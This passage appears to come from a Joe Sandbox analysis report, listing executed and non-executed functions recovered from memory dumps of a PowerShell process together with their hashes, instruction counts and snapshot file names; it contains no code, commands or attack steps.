                                                      • API String ID:
                                                      • Opcode ID: 8c88185cc8666ba2afd49e5e6ac835e5968e742409556b2d3a4aea59727daa13
                                                      • Instruction ID: 0acf4365afc48384195e6e6feb90c074ef7bbbf1c375e5202eaa563ec6e40307
                                                      • Opcode Fuzzy Hash: 8c88185cc8666ba2afd49e5e6ac835e5968e742409556b2d3a4aea59727daa13
                                                      • Instruction Fuzzy Hash: 39A1C4B0A00205EFDB15CB54C561BEEBBF2AF89304F10846AD9556F395CB31EC86CB91
                                                      Function 02DFF465 Relevance: .3, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b00832ce123229ca7af70b2994ab74840f789f6c2a4f8bfd756b4c2469fcd1a
                                                      • Instruction ID: 5859fd4ded3c396e436954f35bed5aba69f16ac5ea093616c8f30d2940999729
                                                      • Opcode Fuzzy Hash: 0b00832ce123229ca7af70b2994ab74840f789f6c2a4f8bfd756b4c2469fcd1a
                                                      • Instruction Fuzzy Hash: 2BB19D70E002098FDF60CFA8D88179DBBF1AF48318F198129D919EB794EB749C85CB85
                                                      Function 02DF87A8 Relevance: .2, Instructions: 208COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81cdebbe767decf8abdf5bb32035e8ae3ebd2c4b6eb4c34f763f62712b507d41
                                                      • Instruction ID: 59c7fe10aae65216292c39a9399f57f374e53650474327733fcc74b1c14de72e
                                                      • Opcode Fuzzy Hash: 81cdebbe767decf8abdf5bb32035e8ae3ebd2c4b6eb4c34f763f62712b507d41
                                                      • Instruction Fuzzy Hash: 5381DF34A05244AFCB05CFA8D4849ADBBF2FF89314F1984A9E545EB322CB35EC81DB51
                                                      Function 074D9D6C Relevance: .2, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f6aecc8690794b17f4bd02e789cfa0926bd166548b461f7215f1be9f2485619d
                                                      • Instruction ID: a0c6a2892e35be37fa5fecf5289f160a52f3e5ee9dcc3714a4e0b2bd5bfe0dfa
                                                      • Opcode Fuzzy Hash: f6aecc8690794b17f4bd02e789cfa0926bd166548b461f7215f1be9f2485619d
                                                      • Instruction Fuzzy Hash: 8A715EB4A04205EFCB14CF54C465ADABBF2EF49314F14855BE854AB365CB36EC82CB91
                                                      Function 074D9D90 Relevance: .2, Instructions: 192COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c217889453d4cb713223ed4448f7877f8468a6c9bd85edaf9c12800d0706e9f
                                                      • Instruction ID: cb1efac241dc30cb359b572906e89a7b843763301a352765bf2454a64b5e7759
                                                      • Opcode Fuzzy Hash: 6c217889453d4cb713223ed4448f7877f8468a6c9bd85edaf9c12800d0706e9f
                                                      • Instruction Fuzzy Hash: 977172B0A04205EFCB14CF58C565ADEBBF2EF89314F14846AD854AB355CB32EC82CB91
                                                      Function 02DF9708 Relevance: .2, Instructions: 192COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6fc2bc965100882e0cd4676d69cbba87ea209eb090d6cedaa24d3607474fe95
                                                      • Instruction ID: b8709a7287eac7532b79aa42e82a14da79b17397a4a9440e74452ac7f9b5287e
                                                      • Opcode Fuzzy Hash: d6fc2bc965100882e0cd4676d69cbba87ea209eb090d6cedaa24d3607474fe95
                                                      • Instruction Fuzzy Hash: 7D71AB30A00209CFCB14DF68D494A9EBBF2EF85314F15896AE419DB3A1DB75EC46CB94
                                                      Function 02DF9876 Relevance: .2, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 626d324999fbec7f6c080e447b5ea69ecdd9280c5dd5e137d4012719b61f8a44
                                                      • Instruction ID: d001bdecad737f2b51d99ea2967156ae7ad542957740951eee8b480c79a5382c
                                                      • Opcode Fuzzy Hash: 626d324999fbec7f6c080e447b5ea69ecdd9280c5dd5e137d4012719b61f8a44
                                                      • Instruction Fuzzy Hash: 1C712870E00208DFDB15DFB5D494BADBBB2BF88308F158529D516AB390DB34AC86CB55
                                                      Function 02DF317D Relevance: .2, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 310b4dfe88ce92bc821ce0cbb0118d659ddb831c5f76e1a292a0456902628047
                                                      • Instruction ID: 85f9369a666a1e230b5326962874ee858b1965c3a2f09159c24e642894cb4cad
                                                      • Opcode Fuzzy Hash: 310b4dfe88ce92bc821ce0cbb0118d659ddb831c5f76e1a292a0456902628047
                                                      • Instruction Fuzzy Hash: D0417E3560E3E15FD703DB68A9604EA7F70EE87220B1A81E7D480DB2A3C624DD49C7A5
                                                      Function 074DBF25 Relevance: .1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 18a10eccf2cc310aa3025888829a195aa3f9eddadbfefc0101ee9a23c7c197c7
                                                      • Instruction ID: afba318fd48114ebeb8091e04df228aaa57058c1b44c9a6b40f673f735b87b9a
                                                      • Opcode Fuzzy Hash: 18a10eccf2cc310aa3025888829a195aa3f9eddadbfefc0101ee9a23c7c197c7
                                                      • Instruction Fuzzy Hash: 894128F1B40210DBCB1557B84861AEFBB929FD1224B1045AFD9429B351DE329D46C7A2
                                                      Function 02DF96F3 Relevance: .1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f453bb597a7214e65455cbbfeaa4275e3d31ad4bf3a725ccb45cdccd7269c634
                                                      • Instruction ID: 973709f26a849e4793a20bcd2d8be093cd63734cd18af94fd720db60b55b4091
                                                      • Opcode Fuzzy Hash: f453bb597a7214e65455cbbfeaa4275e3d31ad4bf3a725ccb45cdccd7269c634
                                                      • Instruction Fuzzy Hash: 7D414970E00208DFDB58DFA9C86479EBBB2FF85304F158829D446AB394EB75AC45CB54
                                                      Function 02DF9499 Relevance: .1, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 112b3ba6bc80d1c278de7d9cc0cf917db62bfce40b19791b446b62d8c66dce01
                                                      • Instruction ID: 437ab46e9c2cd49c9f285dc7d7f5c043ac8b97d28d97d5bcf97bca00bedc7a6b
                                                      • Opcode Fuzzy Hash: 112b3ba6bc80d1c278de7d9cc0cf917db62bfce40b19791b446b62d8c66dce01
                                                      • Instruction Fuzzy Hash: F1417730A40280CFDB19DF24C968BAEBBB6EF89355F154868E506EB3A0DB359C41CB54
                                                      Function 074D9E2B Relevance: .1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 830c6ad5affdf6b1cbca38b42b029430df46ad572b0c1e524daf12f012fb9524
                                                      • Instruction ID: eb1d1d4de3030df6ecde36d324b4d33f59b88b4dad0dddcee03671e1d47e9d66
                                                      • Opcode Fuzzy Hash: 830c6ad5affdf6b1cbca38b42b029430df46ad572b0c1e524daf12f012fb9524
                                                      • Instruction Fuzzy Hash: 35414DB0A04205EBDB14CF94C5A1AEAFBB2FF49314F14855AE855AB355C731EC82CF91
                                                      Function 02DF2C59 Relevance: .1, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32628bd4ab340404755cab161a6ff0b65ecea0258cfc6282f3b5a1c2abccaf02
                                                      • Instruction ID: be2c60b61b6c8718abcc7fdd2da986fb7831248ec1857844da976a60887fec37
                                                      • Opcode Fuzzy Hash: 32628bd4ab340404755cab161a6ff0b65ecea0258cfc6282f3b5a1c2abccaf02
                                                      • Instruction Fuzzy Hash: 444148B5A005058FCB45CF49C998AEAFBB1FF48314B12825AD905AB365C736FC91CFA4
                                                      Function 074D9BD6 Relevance: .1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a9af61d1b97a0a0f3f50b7a1c1ff9e46b679818a2137c34a08ca74d132448392
                                                      • Instruction ID: 1a2e78c03f8844ff529f98969bab794198faca1c774dcaefd54b5641f48fe62b
                                                      • Opcode Fuzzy Hash: a9af61d1b97a0a0f3f50b7a1c1ff9e46b679818a2137c34a08ca74d132448392
                                                      • Instruction Fuzzy Hash: B631B5B0B40208AFD704A764C855FEE7BA3EB95744F108425E9156F3A5CF76AC428BE1
                                                      Function 074D0A78 Relevance: .1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b85c9e6f2afbc964ea848b7e1ff09e3e83345df0e1b2fc5a6e73f6d3c48cd08
                                                      • Instruction ID: dde27022a346660ea710c5c47a97970c802257215530282e1e405d2902ad8b0c
                                                      • Opcode Fuzzy Hash: 8b85c9e6f2afbc964ea848b7e1ff09e3e83345df0e1b2fc5a6e73f6d3c48cd08
                                                      • Instruction Fuzzy Hash: 5F217CB13043167BCB2459EA8820BB7B6C6ABD5709F20882BA589CF390CE75CC418361
                                                      Function 074D0A5D Relevance: .1, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa091b6508715eca478aa3b91076ab74b93127ee206fe98e75093a5d462ce1ad
                                                      • Instruction ID: 5bf1a61e72fcaafba4a8be0319e2e169ada111b45044624da19e6cf03b7c8ca0
                                                      • Opcode Fuzzy Hash: fa091b6508715eca478aa3b91076ab74b93127ee206fe98e75093a5d462ce1ad
                                                      • Instruction Fuzzy Hash: 63216DB43083967BC71106A688207F77BE59F92704F248457A984CF3A2C6758C84C372
                                                      Function 074D0868 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 960664480e36cb81bfc3296881c9450abe4eb1c61e493dd3d213ccc90404bb5b
                                                      • Instruction ID: 74e4155a18a9a10c35ca6d67831e08b2399edec42bedfc0fa7fdc02e5397bf3d
                                                      • Opcode Fuzzy Hash: 960664480e36cb81bfc3296881c9450abe4eb1c61e493dd3d213ccc90404bb5b
                                                      • Instruction Fuzzy Hash: 2301D4763002169BC72465AAE4106ABB799DFC2222F14883FE585CB760DA32CC4587A0
                                                      Function 02DFEE8B Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2235f8410febec42bf209657b2c33a65882b00dd7a1d56f60189e9743cbc692e
                                                      • Instruction ID: b14e5daa972cefef16bdfed3bede2a26abd2bf5e4445f03925403c05d2a0b17e
                                                      • Opcode Fuzzy Hash: 2235f8410febec42bf209657b2c33a65882b00dd7a1d56f60189e9743cbc692e
                                                      • Instruction Fuzzy Hash: 3F11C830D11158DBDF74DB94E5987ECB7B2AF0531AF162429D201B62A0EB745C89CF1A
                                                      Function 02D8D01D Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2969960776.0000000002D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2d8d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a751f27dce5bb3bac87bde78678190a60a65ef9c4bd6d8e16eaa63a8db8beec
                                                      • Instruction ID: 92f11797e8c303cdf8fa4b8d8c1aad9de4e74c08caf5ab2ef114d328517f58af
                                                      • Opcode Fuzzy Hash: 5a751f27dce5bb3bac87bde78678190a60a65ef9c4bd6d8e16eaa63a8db8beec
                                                      • Instruction Fuzzy Hash: 0F0126710083049AE720AA3ADD84B67BF99EF41324F28C42AEC484B3C6C779DC41C6B1
                                                      Function 02D8D005 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2969960776.0000000002D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2d8d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 692bc43726dc9c495f2885213c4a169cfb34d72c30d9565a7fdd6880e22ae8f6
                                                      • Instruction ID: 8637e4a69bca9852c6b654924358ed3c1dbb78a1843a3863076303c2ec3fd622
                                                      • Opcode Fuzzy Hash: 692bc43726dc9c495f2885213c4a169cfb34d72c30d9565a7fdd6880e22ae8f6
                                                      • Instruction Fuzzy Hash: 8A01296100E3C09ED7128B358C94B62BFB4EF47224F1984DBD8888F2E3C2699849C772

                                                      Non-executed Functions

                                                      Function 074D2D30 Relevance: 16.7, Strings: 13, Instructions: 485COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$84l$84l$tP^q$tP^q$t~qq$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-758525668
                                                      • Opcode ID: 2ccc0f596e44a01aeebdb9d1fdeb84b1d6c6e1251d4c23134f27111db0016ee0
                                                      • Instruction ID: 87f5d46cb05fa8c810be55396e9195a3c7d08ed2a416c88dda85a2b908e25f56
                                                      • Opcode Fuzzy Hash: 2ccc0f596e44a01aeebdb9d1fdeb84b1d6c6e1251d4c23134f27111db0016ee0
                                                      • Instruction Fuzzy Hash: 85F136B1B00216DFCB159F6994206EBBBE2BF85210F14886BD4858F355DF72DC86C7A2
                                                      Function 06D50048 Relevance: 12.9, Strings: 10, Instructions: 357COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2987626670.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_6d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-518715366
                                                      • Opcode ID: 9cfba05a3c5524b5244ee05de9652094325e9ff151b0f0326a249755ecafa1cc
                                                      • Instruction ID: f7a83388c2af06637cb933b4d18f0e268f169a41a7a3b5dd29ee40fa78265916
                                                      • Opcode Fuzzy Hash: 9cfba05a3c5524b5244ee05de9652094325e9ff151b0f0326a249755ecafa1cc
                                                      • Instruction Fuzzy Hash: E1F159B0A40218DFDB64DB24C954B9ABBB2FB84304F1085E5D9086B395CB71AEC6CF91
                                                      Function 074D3540 Relevance: 12.8, Strings: 10, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-3512890053
                                                      • Opcode ID: c7bb2c8b3bf76062871dbc7a5f138b78e5142cf689b5fd6a43830697806dc23d
                                                      • Instruction ID: 05c6b9886a49e8209b19667837fda8e61f32abc1fcd0fe83ecb301be3a9287ef
                                                      • Opcode Fuzzy Hash: c7bb2c8b3bf76062871dbc7a5f138b78e5142cf689b5fd6a43830697806dc23d
                                                      • Instruction Fuzzy Hash: 7BA106B1B04246DFCB244E6998246EB7BE5AF82610F15886BD485CB351DF35CC86C7A3
                                                      Function 074DA449 Relevance: 10.2, Strings: 8, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-3865595929
                                                      • Opcode ID: a4e6c3b9c3a8e2bab79c43ffdf0fa6df44f43f11777bfd4f004f91c87bae1325
                                                      • Instruction ID: 5a2cfe080b9d59de315a1dbdef1a90c930d020f74781a5e1b880e18e14bfe4e4
                                                      • Opcode Fuzzy Hash: a4e6c3b9c3a8e2bab79c43ffdf0fa6df44f43f11777bfd4f004f91c87bae1325
                                                      • Instruction Fuzzy Hash: FD5107B1B44209DFCB158F6484787EABBE2AB85710F14C86BD4858F355CB32CD46CB91
                                                      Function 074D18B9 Relevance: 7.7, Strings: 6, Instructions: 242COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$84l$84l$tP^q$tP^q
                                                      • API String ID: 0-3307220471
                                                      • Opcode ID: ac32389c81d8f5a07557d4f2d9d4ec7736ccd70de52b1e7ade241389919a969e
                                                      • Instruction ID: b1f7e6b6a261debec6b6688f0f07fa3fee36fad605c30b9443256ec1c7fea883
                                                      • Opcode Fuzzy Hash: ac32389c81d8f5a07557d4f2d9d4ec7736ccd70de52b1e7ade241389919a969e
                                                      • Instruction Fuzzy Hash: 85916EB1A00219DFCB148F44C564AEABBF2BF4A710F1A8496EC959B355D731EC82CB91
                                                      Function 074DDB98 Relevance: 7.7, Strings: 6, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-3669853574
                                                      • Opcode ID: 5fa263d6a74ee492f786042699cf21fffea378891ddb5aaa7cf9f120edc15bed
                                                      • Instruction ID: 194e304180c3f6dcc81efd4da9df62b98533acc6eca5613afa267d0b59aa9dc3
                                                      • Opcode Fuzzy Hash: 5fa263d6a74ee492f786042699cf21fffea378891ddb5aaa7cf9f120edc15bed
                                                      • Instruction Fuzzy Hash: 2E6105B1F002099FCB289E29C4246EB7BF2AB85611F14C86BD4958F355DB31DC85CF90
                                                      Function 074DF48D Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$84l$tP^q$$^q$$^q$$^q
                                                      • API String ID: 0-1270209019
                                                      • Opcode ID: 7dc8c6d973fd1f13311cedf80a40d0f9c88e90bce2c23f74e97c816a2be4d40e
                                                      • Instruction ID: f2926a45c03d3b7267cef36d75a8348c825a735d12e1a3681e88346c1fc455f1
                                                      • Opcode Fuzzy Hash: 7dc8c6d973fd1f13311cedf80a40d0f9c88e90bce2c23f74e97c816a2be4d40e
                                                      • Instruction Fuzzy Hash: 9561F4B0A1020ADFCB348E54C564BEB77E1AF45311F698457E8A25B3A1C731ED8ACB91
                                                      Function 074DEFFF Relevance: 7.6, Strings: 6, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$(dq$(dq
                                                      • API String ID: 0-3323838033
                                                      • Opcode ID: 50742b53011c48b54dab40a3fc3831af4b2547abb736660f57891552fd6369a7
                                                      • Instruction ID: 988fac4d45b0d10b082bb2f2ecb6b4b02000c8fd56c4e2480934edaccf85df40
                                                      • Opcode Fuzzy Hash: 50742b53011c48b54dab40a3fc3831af4b2547abb736660f57891552fd6369a7
                                                      • Instruction Fuzzy Hash: A621F871740119DBCB398E14D9207AB77E2AB84710F25885BED936F384CA319D4AC7A1
                                                      Function 074D6E75 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                      • API String ID: 0-3272787073
                                                      • Opcode ID: ce9993c796720a836cdb82a3dd7b908fbc707ae4a45514c0067a07f0a674b0b2
                                                      • Instruction ID: 9ca7c7dc694834a31969d6115e82ff4e27df63d1359122ca85db3a4910095a1b
                                                      • Opcode Fuzzy Hash: ce9993c796720a836cdb82a3dd7b908fbc707ae4a45514c0067a07f0a674b0b2
                                                      • Instruction Fuzzy Hash: 453106B2B042068FCB294E68C4241E7B7A1ABC5291B26486FD8858B355DF32CC56C753
                                                      Function 074DDE50 Relevance: 5.5, Strings: 4, Instructions: 481COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$(o^q$(o^q$(o^q
                                                      • API String ID: 0-1978863864
                                                      • Opcode ID: d5b4633c02421103e7395f27b16bfc8e200a695d9beb314692328d4c644cd69a
                                                      • Instruction ID: 4740de9df6ee1bb947c81d16762a6b4b05e1bea011b36ffe970c910a1d992b3b
                                                      • Opcode Fuzzy Hash: d5b4633c02421103e7395f27b16bfc8e200a695d9beb314692328d4c644cd69a
                                                      • Instruction Fuzzy Hash: 6AF114B1B04315DFCB158F68D824BEBBBA2AB85310F14886BE5958F391DB31DC85CB61
                                                      Function 074D7838 Relevance: 5.3, Strings: 4, Instructions: 279COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 84l$84l$tP^q$tP^q
                                                      • API String ID: 0-968489892
                                                      • Opcode ID: b37c96df52aecab9d365f8ecca823acd5ed26dc4d929a8aa8dfb51b2600d7214
                                                      • Instruction ID: 47b9f06ed53e913153712a659d6b34d3039f1465fcd96180175c1b574800cc8f
                                                      • Opcode Fuzzy Hash: b37c96df52aecab9d365f8ecca823acd5ed26dc4d929a8aa8dfb51b2600d7214
                                                      • Instruction Fuzzy Hash: D6914BB1B002069FCB169E798864BBBBBE2AFC5710F14886BD985CF391CA31DD45C761
                                                      Function 074DEFD6 Relevance: 5.1, Strings: 4, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
